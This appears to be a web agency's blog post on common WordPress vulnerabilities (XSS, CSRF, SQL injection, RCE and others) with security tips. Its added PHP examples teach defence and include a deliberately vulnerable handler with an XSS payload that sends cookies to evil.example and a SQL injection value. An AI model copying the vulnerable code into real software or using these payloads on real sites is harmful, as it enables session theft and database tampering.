Common WordPress Vulnerabilities & Security Best Practices

WordPress is free open-source software used to manage content for websites and blogs. WordPress powers 43% of all websites on the internet, making it the most widely used content management system (CMS) on the planet. And it’s showing no sign of slowing down. WordPress has been increasing in usage every year for more than a decade now. But how did WordPress get so popular?

You don’t become the world’s favourite CMS by being complicated and finicky. WordPress is well known for its easy-to-use interface. There are plenty of tutorials, and the customization available in WordPress is easy to access and get the hang of. Plus, there are thousands of free templates to pick from, and you don’t need to be a professional programmer to build your own from scratch.

Like anything hosted on the web these days, WordPress is exposed to cybercriminals, bugs and other security risks. It is one of the more secure CMS platforms, but no software is perfect, and because it is so widely used, WordPress has been a prime target for attackers for the past couple of decades.


If a cybercriminal does gain entry to your site, a lot can go wrong. Your site could suffer long periods of downtime, which hurts your traffic, and your private data could be exposed, including your website visitors’ data. A data leak of this kind damages not only your site but the reputation of your brand as well.


Common WordPress Vulnerabilities

WordPress vulnerabilities detected (image credit to iThemes)

In this article, we’ll outline some of the most common WordPress vulnerabilities your website could be exposed to. But first, to get an idea of what your site is being exposed to, sign up for the WordPress Vulnerability Report from iThemes.

In this report, you’ll see that WordPress vulnerabilities are placed into one of three categories: WordPress Core, Themes or Plugins. ‘Core’ is the stock version of WordPress, and includes all the foundational files that the CMS requires to function. ‘Themes’ are groups of files that tell WordPress how a site should look – there are thousands to choose from. ‘Plugins’ are pieces of software that you add to your website to extend its functionality. Plugins account for the large majority of reported WordPress vulnerabilities, so the more plugins a site runs, the larger its attack surface.


Let’s dive in:

  • Cross-site Scripting: Also known as XSS, cross-site scripting is the injection of malicious script into pages served by an otherwise trusted website. The script then runs in the browser of every visitor who loads that page, with that visitor’s privileges on the site, which lets the attacker steal session cookies, perform actions as the user or deface the page. In WordPress it usually stems from a plugin or theme echoing user-supplied input without escaping it.
  • Outdated Plugins: When a developer abandons a plugin, or ships new versions while sites keep running old ones, the installed copy stays exposed to publicly documented flaws that have already been fixed upstream. An outdated plugin may simply stop working, but the bigger risk is that attackers scan for known vulnerable versions and exploit them at scale.
  • Cross-site Request Forgery: CSRF is an attack that tricks a logged-in user’s browser into submitting a request the user never intended, such as transferring funds or changing the login email address. The attacker never needs the victim’s credentials: the browser automatically attaches the victim’s session cookies, so the application accepts the forged request as genuine. WordPress defends against this with nonces that every state-changing form or request must carry.
  • SQL Injection: SQL injection is a common web attack against your database. When a page asks for input such as a username or email address, the attacker supplies text containing SQL syntax; if the application concatenates that input into a query instead of binding it as a parameter, the database executes the attacker’s SQL and data can be read, altered or deleted.
  • Bypasses: Authentication bypasses let cybercriminals skip the login screen and act as a WordPress user. A typical case is a flawed password-reset or login flow that lets the attacker reset or replace a user’s credentials without proving who they are.
  • RCE Vulnerabilities: Remote Code Execution (RCE) is a flaw that lets an attacker run code of their choosing on the server, for example by getting a PHP file onto disk through an unchecked upload form. Through this kind of attack, an entire web application or web server can be compromised.
  • PHP Vulnerabilities: ‘PHP vulnerabilities’ is an umbrella term for application-level flaws in PHP code, including XSS, CSRF and SQL injection. Because WordPress, its themes and its plugins are written in PHP, these flaws allow an attacker to perform a broad range of attacks on websites running it.

Different types of WordPress vulnerabilities (image credit to iThemes)

  • DDoS Attacks: A distributed denial of service (DDoS) attack uses many devices to flood the server hosting a WordPress site with traffic or requests, with the aim of slowing it down or crashing it.
  • REST API: A REST API vulnerability is one where an attacker can use the WordPress REST API to read or edit content, such as the body of a post or page, without the permission that would normally be required. It is exploited with a crafted HTTP request to an API endpoint whose permission checks or input validation are flawed.
  • Weak Passwords: Weak passwords are a common vulnerability that can allow attackers to do a lot of damage. If your passwords are short, easy to guess or reused from other sites, cybercriminals will have an easier time getting into your site, whether by guessing or with automated brute-force tools.
  • Sensitive Info Disclosure: Sensitive information disclosure happens when a website unintentionally reveals sensitive information, such as private user data, financial information or login details, to anyone who requests it.
  • Malware: Malware is a blanket term for malicious software rather than a vulnerability in itself: it is what attackers install once a vulnerability has been exploited. Malware can steal, encrypt or delete sensitive data, or hijack functions of your website, and includes viruses, worms, ransomware and spyware.
  • Phishing: Phishing is a type of attack aimed at stealing your money, identity, login credentials or other information. Cybercriminals commonly use deceptive emails and text messages to trick users into handing that information over.
  • Hypertext Transfer Protocol: HTTP is an unencrypted application-layer internet protocol, first developed in 1989, and it is insecure because anyone on the network path can read or alter the traffic, including login credentials. The secure variant is HTTPS, which encrypts the connection with TLS and is used by most reputable websites.
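To make the XSS, CSRF and SQL injection items above concrete, here is an added example (not code from the original article, from iThemes or from Caorda) of a small WordPress plugin handler written twice: once with all three flaws, and once hardened with the core API WordPress provides for each. The plugin, its table name demo_notes and the action name demo_save_note are hypothetical names chosen for illustration; every WordPress function used (add_action, current_user_can, check_admin_referer, wp_nonce_field, $wpdb->prepare, esc_html and so on) is real core API.

```php
<?php
/**
 * Added example: a WordPress admin-post handler, vulnerable and hardened.
 * "demo_notes" and "demo_save_note" are hypothetical names for illustration.
 */

// ---------- Vulnerable version: SQL injection + XSS + no CSRF protection ----------
function demo_save_note_vulnerable() {
    global $wpdb;
    $table   = $wpdb->prefix . 'demo_notes';
    $note_id = $_POST['note_id'];   // untrusted, used as-is
    $body    = $_POST['body'];      // untrusted, used as-is

    // SQL injection: the unquoted id is concatenated straight into the query.
    // note_id=1 OR 1=1 turns this into an UPDATE of every row in the table.
    $wpdb->query( "UPDATE $table SET body = '$body' WHERE id = $note_id" );

    // XSS: the submitted text is echoed back unescaped, so
    // body=<script>document.location='https://evil.example/?c='+document.cookie</script>
    // executes in the browser of whoever sees this response.
    echo 'Saved: ' . $body;
}

// CSRF: no nonce in the form, so any page the logged-in victim visits can
// auto-submit this form and the browser will attach the victim's cookies.
function demo_note_form_vulnerable( $note_id ) {
    echo '<form method="post" action="' . admin_url( 'admin-post.php' ) . '">';
    echo '<input type="hidden" name="action" value="demo_save_note">';
    echo '<input type="hidden" name="note_id" value="' . $note_id . '">';
    echo '<textarea name="body"></textarea><button>Save</button></form>';
}

// ---------- Hardened version ----------
function demo_save_note_hardened() {
    global $wpdb;
    $table = $wpdb->prefix . 'demo_notes';

    // Authorization: only users who may edit content can reach this at all.
    if ( ! current_user_can( 'edit_posts' ) ) {
        wp_die( 'Forbidden', '', array( 'response' => 403 ) );
    }
    // CSRF: dies with a 403 unless the request carries a valid nonce for this action.
    check_admin_referer( 'demo_save_note' );

    // Input validation: force the id to a non-negative integer, strip tags from the body
    // (WordPress slashes $_POST, so unslash before sanitizing).
    $note_id = absint( $_POST['note_id'] ?? 0 );
    $body    = sanitize_textarea_field( wp_unslash( $_POST['body'] ?? '' ) );

    // SQL injection: values are bound through prepare(), never concatenated.
    $wpdb->query( $wpdb->prepare(
        "UPDATE $table SET body = %s WHERE id = %d",
        $body,
        $note_id
    ) );

    // XSS: escape on output, using the escaper for the context (HTML text here).
    echo 'Saved: ' . esc_html( $body );
}

function demo_note_form_hardened( $note_id ) {
    echo '<form method="post" action="' . esc_url( admin_url( 'admin-post.php' ) ) . '">';
    echo '<input type="hidden" name="action" value="demo_save_note">';
    echo '<input type="hidden" name="note_id" value="' . esc_attr( absint( $note_id ) ) . '">';
    wp_nonce_field( 'demo_save_note' );   // emits the _wpnonce and _wp_http_referer fields
    echo '<textarea name="body"></textarea><button>Save</button></form>';
}

// Register the hardened handler; admin_post_{action} fires for logged-in users.
add_action( 'admin_post_demo_save_note', 'demo_save_note_hardened' );
```

Two points worth keeping in mind when reviewing plugin code like this. A WordPress nonce is tied to the logged-in user and the action name and expires after a day, so it stops cross-site forgery but is not an authorization check; the current_user_can() test is still needed. And $wpdb->prepare() binds values only, which is why the table name is built from $wpdb->prefix rather than from request input.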


How Caorda Can Protect Your Site


Far more than just building websites, Caorda specializes in the hosting, maintenance and support of websites as well. Our experienced team of web developers and technical support staff are ready to protect and maintain the security of your website, fixing bugs and implementing preventative maintenance strategies. It’s what we do.

Tips for securing your WordPress site:

  • Install and configure a security plugin
    We recommend iThemes Security and Sucuri.  These can be run together to provide the best coverage.
  • Lock your site files
    Customers on our monthly maintenance plan benefit from having their site files locked at the server level.  This means that even if a hacker gets into your site, they are unable to upload or delete any core files.  This is an extra safeguard to protect your site.
  • Keep your site up to date
    Our maintenance plan customers benefit from monthly core, theme and plugin updates on their site as well as a fast response to any reported vulnerability.  We’ll get you patched up and on your way.  If there’s no known fix for the issue, we’ll recommend a replacement and help get your site back up and running, safely.
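For readers who want to apply the file-locking and update ideas from the three tips above on their own hosting, here is an added example (not configuration from the original article or from Caorda) of the wp-config.php constants WordPress itself offers for this. All the constants are real core settings; the values shown assume a site whose updates are applied out of band, for example with WP-CLI or a deploy pipeline, rather than through wp-admin.

```php
<?php
// Added example: hardening constants for wp-config.php.
// Assumes the site is updated by a maintainer outside wp-admin (see note on DISALLOW_FILE_MODS).

// Remove the built-in theme/plugin code editor from the dashboard: a stolen
// admin session can no longer write arbitrary PHP to disk through wp-admin.
define( 'DISALLOW_FILE_EDIT', true );

// Go further and forbid all plugin/theme installs, updates and uploads
// through wp-admin. Trade-off: WordPress's own automatic updater is also
// disabled while this is set, so core, plugin and theme updates must then be
// applied on a schedule by other means (WP-CLI, deploy pipeline).
define( 'DISALLOW_FILE_MODS', true );

// Serve the login page and the whole admin area only over HTTPS, so
// credentials and session cookies never travel over plain HTTP.
define( 'FORCE_SSL_ADMIN', true );

// For sites that do NOT set DISALLOW_FILE_MODS, keep the automatic updater's
// behaviour explicit: 'minor' applies security and maintenance releases only.
// define( 'WP_AUTO_UPDATE_CORE', 'minor' );
```

The server-level counterpart is filesystem permissions: if the account the PHP process runs as cannot write to wp-admin, wp-includes and the plugin and theme directories, an attacker who gains application-level access still cannot replace core files. With DISALLOW_FILE_MODS set, pending updates can be listed from the command line with WP-CLI (wp core check-update, wp plugin list --update=available, wp theme list --update=available) and applied on the maintenance schedule.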

If you don’t have resources to monitor for vulnerabilities and perform regular updates on your WordPress website, reach out to Caorda. We offer Support & Maintenance plans to keep your WordPress site secure. Contact us today for a consultation:

Get in touch today!